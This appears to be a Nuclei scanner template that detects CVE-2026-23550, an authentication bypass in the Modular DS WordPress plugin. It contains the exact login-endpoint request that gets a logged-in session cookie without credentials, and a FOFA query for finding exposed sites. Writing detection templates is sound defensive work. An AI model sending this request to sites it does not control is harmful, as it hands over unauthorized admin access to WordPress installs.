id: CVE-2026-23550

info:
  name: Modular DS - Broken Access Control
  author: DhiyaneshDk
  severity: high
  description: |
    Modular DS = 2.5.1 contains a broken access control vulnerability caused by incorrect privilege assignment, letting attackers escalate their privileges, exploit requires no special conditions.
  impact: |
    Attackers can escalate their privileges, potentially gaining unauthorized access to sensitive functions or data.
  remediation: |
    Update to the latest version beyond 2.5.1.
  reference:
    - https://help.modulards.com/en/article/modular-ds-security-release-modular-connector-252-dm3mv0/
    - https://patchstack.com/database/wordpress/plugin/modular-connector/vulnerability/wordpress-modular-ds-monitor-update-and-backup-multiple-websites-plugin-2-5-1-privilege-escalation-vulnerability
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="/plugins/modular-connector/"
  tags: cve,cve2026,wordpress,wp-plugin,wp,auth-bypass,modular-connector,vkev

variables:
  string: "{{to_lower(rand_text_alpha(5))}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php/api/modular-connector/login/{{string}}?origin=mo&type=foo"
      - "{{BaseURL}}/api/modular-connector/login/{{string}}?origin=mo&type=foo"

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, "wordpress_logged_in")
        condition: and
# digest: 4a0a00473045022100c46495eb5fe71644479d0feb21339e99a6f869f87692322e2e7e35f9068a08be022069850f178d71c1299402fe646c184201d6c22ecce1ba557dd434fcdf5c012e49:922c64590222798bb761d5b6d8e72950